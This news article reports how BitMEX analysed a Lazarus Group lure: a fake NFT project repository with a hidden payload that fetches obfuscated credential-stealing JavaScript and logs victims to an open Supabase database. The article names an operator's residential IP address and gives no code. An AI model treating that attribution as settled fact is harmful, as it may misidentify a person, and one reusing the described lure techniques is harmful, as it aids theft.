BitMEX, the cryptocurrency exchange, has successfully thwarted a hacking attempt by the Lazarus Group. This group is a collective tied to North Korea’s cyber warfare unit. In a detailed blog post released on Friday, BitMEX revealed how its security team uncovered sloppy mistakes made by the attackers. They exposed infected device logs, real IP addresses, and operational flaws. The incident highlights the sophistication and vulnerabilities of one of the world’s most notorious hacking groups.
How the Attack Was Foiled
The attempted hack began when a BitMEX employee was contacted on LinkedIn with an offer to work on a fake NFT marketplace project. Recognizing the proposal as a known phishing tactic used by the Lazarus Group, the employee immediately reported it. This action triggered a full investigation.
BitMEX’s security team accessed a GitHub repository shared by the attacker, which contained a Next.js/React project. Hidden within the code was a malicious payload designed to execute on the employee’s system. However, instead of running the code, the team analyzed it directly.
“Throughout the last few years, it appears that the group has divided into multiple subgroups that are not necessarily of the same technical sophistication.”
— BitMEX Security Team
This analysis revealed several red flags. These included a commented-out line of code that would have fetched and executed a malicious cookie from a domain previously linked to Lazarus by Palo Alto Networks’ Unit 42. Another active line of code sent a request to a different domain, fetching obfuscated JavaScript. Using tools like webcrack, BitMEX deobfuscated the script, uncovering three distinct components mashed together.
Uncovering Lazarus Fingerprints
One part of the malware contained identifiers for Chrome extensions. These are often used in credential-stealing operations. A string labeled p.zi matched older Lazarus malware from the BeaverTail campaign, previously documented by Unit 42. While BitMEX did not re-analyze the BeaverTail component, they focused on another critical discovery. The malware connected to an open Supabase database.
Supabase, a backend platform similar to Firebase, was left completely unprotected by the attackers. When BitMEX tested the database, they gained direct access without requiring a login or authentication.
Exposing Infected Device Logs and Real IPs
The Supabase database contained 37 logs of infected machines. Each entry showed details such as usernames, hostnames, operating systems, IP addresses, geolocations, and timestamps. Patterns emerged, with some devices appearing repeatedly—likely developer or test machines. Hostnames with a consistent 3-XXX structure , and many IPs links to VPN providers.
However, one user, identified as Victor, made a critical mistake. While he frequently used Touch VPN, one log revealed his real residential IP address: 223.104.144.97, located in Jiaxing, China, under China Mobile. This slip-up likely exposed the real identity of a Lazarus operator, marking a significant operational failure.
Another user, GHOST72, relied on Astrill VPN, but their activity also pointed to potential lapses. Since May 14, BitMEX’s monitoring tool has collected 856 entries from the database. They identified 174 unique combinations of usernames and hostnames.
Insights into Lazarus Operations
By analyzing timestamps, BitMEX observed a drop in Lazarus activity between 8 AM and 1 PM UTC. This time corresponds to evening hours in Pyongyang. This structured schedule further confirms that the group operates as an organized team rather than a loose collective of freelancers.
The attack also revealed a division within the group. The initial phishing attempt on LinkedIn was relatively amateurish, while the post-exploitation script demonstrated advanced skills. According to BitMEX:
“Throughout the last few years, it appears that the group has divided into multiple subgroups that are not necessarily of the same technical sophistication.”
This pattern aligns with previous incidents, such as the Bybit breach, where one team handled phishing. Another team conducted advanced intrusions once access was gained.
Strengthening Internal Monitoring
Following the incident, BitMEX has implemented an internal monitoring system to detect future infections and catch operational security errors. The system continuously pings the exposed Supabase database, collecting new entries and analyzing them for indicators of compromise (IoCs).
BitMEX also extracted IoCs from the malware. They renamed variables and cleaned the script to understand its functionality. Early parts of the code sent system data (e.g., usernames, IPs) directly into the unprotected Supabase database. This made tracking easy for anyone who discovered it.
